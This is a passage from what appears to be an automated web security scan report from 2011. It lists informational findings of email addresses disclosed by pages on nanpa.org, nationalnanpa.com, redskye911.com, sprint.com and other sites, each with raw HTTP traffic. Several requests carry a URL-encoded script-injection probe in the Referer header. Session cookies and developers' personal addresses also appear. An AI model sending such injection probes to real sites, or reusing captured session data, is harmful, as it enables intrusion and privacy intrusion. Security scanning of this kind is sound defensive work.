Content-Type: application/x-javascript

/*
Filename: curr_year.js
Desc: Display the current year
Author: Relevant Arts Enterprise, Inc. <http://www.relevantarts.com/>
John A. Lock <jlock@relevantarts.com>
Created: 2007-Apr-
...[SNIP]...

21.33. http://www.nanpa.org/javascript/external.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nanpa.org
Path:	/javascript/external.js

Issue detail

The following email address was disclosed in the response:

jlock@relevantarts.com

Request

GET /javascript/external.js HTTP/1.1
Host: www.nanpa.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:12:40 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 16:56:37 GMT
ETag: "b44cbf-79b-49a9a7ba69b40"
Accept-Ranges: bytes
Content-Length: 1947
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript

/*
Filename: external.js
Desc: Generic script to launch external links and PDFs in a new window
Author: Relevant Arts Enterprise, Inc. <http://www.relevantarts.com/>
John A. Lock <jlock@relevantarts.com>
...[SNIP]...

21.34. http://www.nanpa.org/javascript/fontsizer.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nanpa.org
Path:	/javascript/fontsizer.js

Issue detail

The following email address was disclosed in the response:

jlock@relevantarts.com

Request

GET /javascript/fontsizer.js HTTP/1.1
Host: www.nanpa.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:12:41 GMT
Server: Apache
Last-Modified: Wed, 05 Jan 2011 09:02:44 GMT
ETag: "b44cbd-7b5-49915a5ed5500"
Accept-Ranges: bytes
Content-Length: 1973
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript

/*
Filename: fontsizer.js
Desc: Font size manager.
Author: Relevant Arts Enterprise, Inc. <http://www.relevantarts.com/>
John A. Lock <jlock@relevantarts.com>
Created: 2008-09-12
Modi
...[SNIP]...

21.35. http://www.nanpa.org/javascript/gen_mm_object.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nanpa.org
Path:	/javascript/gen_mm_object.js

Issue detail

The following email address was disclosed in the response:

jlock@relevantarts.com

Request

GET /javascript/gen_mm_object.js HTTP/1.1
Host: www.nanpa.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:12:42 GMT
Server: Apache
Last-Modified: Thu, 30 Oct 2008 19:32:03 GMT
ETag: "b44cbe-ce1-45a7d890412c0"
Accept-Ranges: bytes
Content-Length: 3297
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript

/*
Filename: gen_mm_object.js
Desc: Generate object and param tags for multimedia content based on browser type
Copyright: Relevant Arts Enterprise, Inc. <http://www.relevantarts.com/>
Author:
...[SNIP]...
<jlock@relevantarts.com>
...[SNIP]...

21.36. http://www.nanpa.org/pullout_menus.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nanpa.org
Path:	/pullout_menus.js

Issue detail

The following email address was disclosed in the response:

jlock@relevantarts.com

Request

GET /pullout_menus.js HTTP/1.1
Host: www.nanpa.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:12:42 GMT
Server: Apache
Last-Modified: Fri, 04 Feb 2011 17:04:08 GMT
ETag: "b4211b-31ab-49b77dec97200"
Accept-Ranges: bytes
Content-Length: 12715
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript

/*
Filename: pullout_menus.js
Desc: Pullout menu definitions for NANPA
Author: Relevant Arts Enterprise, Inc. <http://www.relevantarts.com/>
John A. Lock <jlock@relevantarts.com>
Creat
...[SNIP]...

21.37. http://www.nanpa.org/startup.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nanpa.org
Path:	/startup.js

Issue detail

The following email address was disclosed in the response:

jlock@relevantarts.com

Request

GET /startup.js HTTP/1.1
Host: www.nanpa.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nanpa.org/forumsa3871%3Cscript%3Ealert(%22GHDB%22)%3C/script%3Ed19da0837d8/external.php?type=js

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:12:38 GMT
Server: Apache
Last-Modified: Wed, 02 Feb 2011 20:25:05 GMT
ETag: "b4211c-6a1-49b5271c1ea40"
Accept-Ranges: bytes
Content-Length: 1697
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript

/*
Filename: startup.js
Desc: Generate Javascript code to include external scripts
Copyright: Relevant Arts Enterprise, Inc. <http://www.relevantarts.com/>
Author: John A. Lock <jlock@relevantarts.com>
...[SNIP]...

21.38. http://www.nationalnanpa.com/contact_us/index.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/contact_us/index.cgi

Issue detail

The following email addresses were disclosed in the response:

Nanpa.Feedback@neustar.biz
firstname.lastname@neustar.biz
nanpa-login@neustar.biz

Request

GET /contact_us/index.cgi HTTP/1.1
Host: www.nationalnanpa.com
Proxy-Connection: keep-alive
Referer: http://www.nationalnanpa.com/contact_us/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596; BIGipServernas-ns=2869930176.20480.0000

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:18 GMT
Server: Apache
Content-Type: text/html
Content-Length: 25264

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...
<a href="mailto:nanpa-login@neustar.biz">nanpa-login@neustar.biz</a>
...[SNIP]...
<input type="hidden" name="recipient" value="Nanpa.Feedback@neustar.biz" />
...[SNIP]...
</b> is firstname.lastname@neustar.biz</td>
...[SNIP]...

21.39. http://www.nationalnanpa.com/nas/public/assigned_code_query_display.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/nas/public/assigned_code_query_display.do

Issue detail

The following email address was disclosed in the response:

john.manning@neustar.biz

Request

Response

21.40. http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/nas/public/assigned_code_query_step1.do

Issue detail

The following email address was disclosed in the response:

john.manning@neustar.biz

Request

Response

21.41. https://www.nationalnanpa.com/nas/security/authUser.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.nationalnanpa.com
Path:	/nas/security/authUser.do

Issue detail

The following email address was disclosed in the response:

john.manning@neustar.biz

Request

Response

21.42. https://www.nationalnanpa.com/nas/security/logon.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.nationalnanpa.com
Path:	/nas/security/logon.do

Issue detail

The following email address was disclosed in the response:

john.manning@neustar.biz

Request

Response

21.43. https://www.nationalnanpa.com/nas/security/user_reg_mail.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.nationalnanpa.com
Path:	/nas/security/user_reg_mail.do

Issue detail

The following email address was disclosed in the response:

john.manning@neustar.biz

Request

Response

21.44. https://www.nationalnanpa.com/nas/security/user_reg_pre_mail.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.nationalnanpa.com
Path:	/nas/security/user_reg_pre_mail.do

Issue detail

The following email address was disclosed in the response:

john.manning@neustar.biz

Request

POST /nas/security/user_reg_pre_mail.do;nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596?method=subscribeMailUser HTTP/1.1
Host: www.nationalnanpa.com
Connection: keep-alive
Referer: https://www.nationalnanpa.com/nas/security/user_reg_mail.do?method=createNewMode
Cache-Control: max-age=0
Origin: https://www.nationalnanpa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596
Content-Length: 47

nnsStateListHidden=AK&userStageModel.emailAddr=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:09 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 13295

<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
<META NAME="OWNER" CONTENT="john.manning@neustar.biz">
...[SNIP]...

21.45. https://www.nationalnanpa.com/nas/security/user_reg_pre_step1.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.nationalnanpa.com
Path:	/nas/security/user_reg_pre_step1.do

Issue detail

The following email address was disclosed in the response:

john.manning@neustar.biz

Request

POST /nas/security/user_reg_pre_step1.do?method=userRegStep1 HTTP/1.1
Host: www.nationalnanpa.com
Connection: keep-alive
Referer: https://www.nationalnanpa.com/nas/security/user_reg_step1.do?method=createNewModel
Cache-Control: max-age=0
Origin: https://www.nationalnanpa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596; BIGipServernas-ns=2869930176.20480.0000; __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1; __utmc=82268809; __utmb=82268809.2.10.1305158784
Content-Length: 141

org.apache.struts.taglib.html.TOKEN=34d7dc86f70fe027b1cc8659700841f9&nrufRegRqst=7&coCodeRegRqst=8&otherRegRqst=9&userStageModel.nasRoleId=10

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:04 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 11023

<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
<META NAME="OWNER" CONTENT="john.manning@neustar.biz">
...[SNIP]...

21.46. https://www.nationalnanpa.com/nas/security/user_reg_pre_step2.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.nationalnanpa.com
Path:	/nas/security/user_reg_pre_step2.do

Issue detail

The following email address was disclosed in the response:

john.manning@neustar.biz

Request

POST /nas/security/user_reg_pre_step2.do?method=userRegStep2 HTTP/1.1
Host: www.nationalnanpa.com
Connection: keep-alive
Referer: https://www.nationalnanpa.com/nas/security/user_reg_pre_step1.do?method=userRegStep1
Cache-Control: max-age=0
Origin: https://www.nationalnanpa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596; BIGipServernas-ns=2869930176.20480.0000; __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1; __utmc=82268809; __utmb=82268809.2.10.1305158784
Content-Length: 156

org.apache.struts.taglib.html.TOKEN=625f01d8c4dcdc979d1ed98c5226c392&nrufRegRqst=7&coCodeRegRqst=8&otherRegRqst=9&userStageModel.nasRoleId=10&servicesList=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:10 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18373

<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
<META NAME="OWNER" CONTENT="john.manning@neustar.biz">
...[SNIP]...

21.47. https://www.nationalnanpa.com/nas/security/user_reg_step1.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.nationalnanpa.com
Path:	/nas/security/user_reg_step1.do

Issue detail

The following email address was disclosed in the response:

john.manning@neustar.biz

Request

GET /nas/security/user_reg_step1.do?method=createNewModel HTTP/1.1
Host: www.nationalnanpa.com
Connection: keep-alive
Referer: https://www.nationalnanpa.com/nas/security/authUser.do?function=verifySignIn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596; BIGipServernas-ns=2869930176.20480.0000; __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1; __utmc=82268809; __utmb=82268809.2.10.1305158784

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:57 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 10083

<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
<META NAME="OWNER" CONTENT="john.manning@neustar.biz">
...[SNIP]...

21.48. http://www.onwav.com/css/style.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.onwav.com
Path:	/css/style.css

Issue detail

The following email address was disclosed in the response:

JakeAlger@comcast.net

Request

GET /css/style.css HTTP/1.1
Host: www.onwav.com
Proxy-Connection: keep-alive
Referer: http://www.onwav.com/lnp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dancer.session=9167460976474381584546793963855213

Response

HTTP/1.1 200 OK
Content-Type: text/css
Date: Thu, 12 May 2011 00:48:31 GMT
Connection: keep-alive
Content-Length: 8550

/************************************************
*
* File : css/global.css
* Version : v1.0
* Date : Thursday, 12 July 2007
* Email : JakeAlger@comcast.net
* Website : JakeAlger.com
*
************************************************
* Global style settings
************************************************/

@media screen {

* { m
...[SNIP]...

21.49. http://www.redskye911.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

redsky_wg@workgroup.etalkup.com
support@redskytech.com

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:06:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4mdi3f340bskqq55hrzhsr45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10182

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
RedSky :: The Leader in E911 Solutions
</title><link rel="stylesheet"
...[SNIP]...
<a title="RedSky :: The Leader in E911 Solutions :: Support" href="mailto:support@redskytech.com">
...[SNIP]...
<script type="text/javascript" charset="utf-8" src="http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com">
...[SNIP]...
<a href="http://www.etalkup.com/webchat.aspx?workgroup=redsky_wg@workgroup.etalkup.com">
...[SNIP]...

21.50. http://www.redskye911.com/e911_information_center/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_information_center/

Issue detail

The following email addresses were disclosed in the response:

redsky_wg@workgroup.etalkup.com
support@redskytech.com

Request

Response

21.51. http://www.redskye911.com/e911_information_center/e911_hosted_solutions/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_information_center/e911_hosted_solutions/

Issue detail

The following email addresses were disclosed in the response:

redsky_wg@workgroup.etalkup.com
support@redskytech.com

Request

Response

21.52. http://www.redskye911.com/e911_information_center/e911_hosted_solutions/loadingAnimation.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_information_center/e911_hosted_solutions/loadingAnimation.gif

Issue detail

The following email addresses were disclosed in the response:

redsky_wg@workgroup.etalkup.com
support@redskytech.com

Request

Response

21.53. http://www.redskye911.com/e911_information_center/loadingAnimation.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_information_center/loadingAnimation.gif

Issue detail

The following email addresses were disclosed in the response:

redsky_wg@workgroup.etalkup.com
support@redskytech.com

Request

Response

21.54. http://www.redskye911.com/e911_products/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_products/

Issue detail

The following email addresses were disclosed in the response:

redsky_wg@workgroup.etalkup.com
support@redskytech.com

Request

Response

21.55. http://www.redskye911.com/e911_products/e911_anywhere/hosted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_products/e911_anywhere/hosted/

Issue detail

The following email addresses were disclosed in the response:

redsky_wg@workgroup.etalkup.com
support@redskytech.com

Request

Response

21.56. http://www.redskye911.com/e911_products/e911_anywhere/hosted/loadingAnimation.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_products/e911_anywhere/hosted/loadingAnimation.gif

Issue detail

The following email addresses were disclosed in the response:

redsky_wg@workgroup.etalkup.com
support@redskytech.com

Request

Response

21.57. http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_products/e911_anywhere/hosted/purchasing/

Issue detail

The following email addresses were disclosed in the response:

redsky_wg@workgroup.etalkup.com
support@redskytech.com

Request

Response

21.58. http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/loadingAnimation.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_products/e911_anywhere/hosted/purchasing/loadingAnimation.gif

Issue detail

The following email addresses were disclosed in the response:

redsky_wg@workgroup.etalkup.com
support@redskytech.com

Request

Response

21.59. http://www.redskye911.com/e911_products/e911_anywhere/network_services/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_products/e911_anywhere/network_services/

Issue detail

The following email addresses were disclosed in the response:

redsky_wg@workgroup.etalkup.com
support@redskytech.com

Request

Response

21.60. http://www.redskye911.com/e911_products/loadingAnimation.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_products/loadingAnimation.gif

Issue detail

The following email addresses were disclosed in the response:

redsky_wg@workgroup.etalkup.com
support@redskytech.com

Request

Response

21.61. http://www.redskye911.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/favicon.ico

Issue detail

The following email addresses were disclosed in the response:

redsky_wg@workgroup.etalkup.com
support@redskytech.com

Request

Response

21.62. http://www.redskye911.com/knowledge_base/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/knowledge_base/

Issue detail

The following email addresses were disclosed in the response:

redsky_wg@workgroup.etalkup.com
support@redskytech.com

Request

Response

21.63. http://www.redskye911.com/knowledge_base/loadingAnimation.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/knowledge_base/loadingAnimation.gif

Issue detail

The following email addresses were disclosed in the response:

redsky_wg@workgroup.etalkup.com
support@redskytech.com

Request

Response

21.64. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Issue detail

The following email address was disclosed in the response:

info@nanpa.org

Request

Response

21.65. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The following email address was disclosed in the response:

info@nanpa.org

Request

Response

21.66. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The following email address was disclosed in the response:

info@nanpa.org

Request

Response

21.67. http://www.secviz.org/node/89 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.secviz.org
Path:	/node/89

Issue detail

The following email address was disclosed in the response:

davix@secviz.org

Request

Response

21.68. http://www.sprint.com/assets/scripts/analytics/analyticsFramework.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sprint.com
Path:	/assets/scripts/analytics/analyticsFramework.js

Issue detail

The following email address was disclosed in the response:

jasone@numericanalytics.com

Request

GET /assets/scripts/analytics/analyticsFramework.js HTTP/1.1
Host: www.sprint.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 00:46:09 GMT
Content-length: 35493
Content-type: application/x-javascript
Last-modified: Thu, 05 May 2011 20:37:54 GMT
Etag: "8aa5-4dc30aa2"
Accept-ranges: bytes

/****************************************
* Sprint Analytics Control File
* Designed and Developed by Numeric Analytics
*
* Lead Developer: Jason Eves jasone@numericanalytics.com
*
*
* Purpose: This code is meant to control
* the various aspects of web analytics for
* Sprint.com
*
* Change History
*
* Create Date 11.5.08
*
* Version 1.0
* Edited Fed. 1
...[SNIP]...

21.69. http://www.sprint.com/assets/scripts/analytics/voc/surveyLogic.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sprint.com
Path:	/assets/scripts/analytics/voc/surveyLogic.js

Issue detail

The following email address was disclosed in the response:

jasone@numericanalytics.com

Request

GET /assets/scripts/analytics/voc/surveyLogic.js HTTP/1.1
Host: www.sprint.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF; TLisset=true; s_cc=true; gpv_p37=Support; gpv_p38=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 00:46:22 GMT
Content-length: 17209
Content-type: application/x-javascript
Last-modified: Mon, 11 Oct 2010 20:38:40 GMT
Etag: "4339-4cb375d0"
Accept-ranges: bytes
Connection: close

/****************************************
* Sprint Analytics Control File
* Designed and Developed by Numeric Analytics
*
* Lead Developer: Jason Eves jasone@numericanalytics.com
*
*
* Purpose: This code is meant to control
* the various aspects of web analytics for
* Sprint.com
*
* Logic for Voice of Customer survey system
*************************************
...[SNIP]...

21.70. http://www.westcongroup.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.westcongroup.com
Path:	/

Issue detail

The following email address was disclosed in the response:

webmaster@westcongroup.com

Request

Response

21.71. http://www.westcongroup.com/sites/westcon-group-global/global/compass-e-commerce previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.westcongroup.com
Path:	/sites/westcon-group-global/global/compass-e-commerce

Issue detail

The following email address was disclosed in the response:

webmaster@westcongroup.com

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:10:39 GMT
Server: Apache/2.2.8 (EL)
